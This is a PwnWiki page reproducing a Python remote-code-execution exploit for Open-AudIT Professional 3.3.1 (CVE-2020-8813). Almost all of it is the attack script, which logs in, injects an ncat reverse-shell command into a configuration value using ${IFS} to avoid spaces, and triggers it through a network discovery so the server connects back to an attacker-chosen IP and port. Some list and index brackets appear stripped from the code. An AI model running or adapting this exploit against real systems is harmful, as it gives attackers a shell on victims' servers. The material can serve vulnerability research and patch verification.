免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
EXP
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24
#!/usr/bin/python3
import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
print("~ Usage : ./openaudit-exploit.py url username password ip port")
exit()
url = sys.argv1
username = sys.argv2
password = sys.argv3
ip = sys.argv4
port = sys.argv5
request = requests.session()
def inject_payload():
configuration_path = url+"/en/omk/open-audit/configuration/90"
data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
request.patch(configuration_path, data)
print("+ Payload injected in settings")
def start_discovery():
discovery_path = url+"/en/omk/open-audit/discoveries/create"
post_discovery_path = url+"/en/omk/open-audit/discoveries"
scan_name = "".join(random.choice(string.ascii_uppercase) for i in range(10))
req = request.get(discovery_path)
response = req.text
soup = BeautifulSoup(response, "html5lib")
token = soup.findAll('input')5.get("value")
buttons = soup.findAll("button")
headers = {"Referer" : discovery_path}
request_data = {
"dataattributesname":scan_name,
"dataattributesothersubnet":"10.10.10.1/24",
"dataattributesotherad_server":"",
"dataattributesotherad_domain":"",
"submit":"",
"datatype":"discoveries",
"dataaccess_token":token,
"dataattributescomplete":"y",
"dataattributesorg_id":"1",
"dataattributestype":"subnet",
"dataattributesdevices_assigned_to_org":"",
"dataattributesdevices_assigned_to_location":"",
"dataattributesothernmapdiscovery_scan_option_id":"1",
"dataattributesothernmapping":"y",
"dataattributesothernmapservice_version":"n",
"dataattributesothernmapopen|filtered":"n",
"dataattributesothernmapfiltered":"n",
"dataattributesothernmaptiming":"4",
"dataattributesothernmapnmap_tcp_ports":"0",
"dataattributesothernmapnmap_udp_ports":"0",
"dataattributesothernmaptcp_ports":"22,135,62078",
"dataattributesothernmapudp_ports":"161",
"dataattributesothernmaptimeout":"",
"dataattributesothernmapexclude_tcp_ports":"",
"dataattributesothernmapexclude_udp_ports":"",
"dataattributesothernmapexclude_ip":"",
"dataattributesothernmapssh_ports":"22",
"dataattributesothermatchmatch_dbus":"",
"dataattributesothermatchmatch_fqdn":"",
"dataattributesothermatchmatch_dns_fqdn":"",
"dataattributesothermatchmatch_dns_hostname":"",
"dataattributesothermatchmatch_hostname":"",
"dataattributesothermatchmatch_hostname_dbus":"",
"dataattributesothermatchmatch_hostname_serial":"",
"dataattributesothermatchmatch_hostname_uuid":"",
"dataattributesothermatchmatch_ip":"",
"dataattributesothermatchmatch_ip_no_data":"",
"dataattributesothermatchmatch_mac":"",
"dataattributesothermatchmatch_mac_vmware":"",
"dataattributesothermatchmatch_serial":"",
"dataattributesothermatchmatch_serial_type":"",
"dataattributesothermatchmatch_sysname":"",
"dataattributesothermatchmatch_sysname_serial":"",
"dataattributesothermatchmatch_uuid":""
}
print("+ Creating discovery ..")
req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
disocvery_url = url + req.headers'Location' + "/execute"
print("+ Triggering payload ..")
print("+ Check your nc ;)")
request.get(disocvery_url)
def login():
login_info = {
"redirect_url": "/en/omk/open-audit",
"username": username,
"password": password
}
login_request = request.post(url+"/en/omk/open-audit/login", login_info)
login_text = login_request.text
if "There was an error authenticating" in login_text:
return False
else:
return True
if login():
print("+ LoggedIn Successfully")
inject_payload()
start_discovery()
else:
print("- Cannot login!")
pwnwiki.com
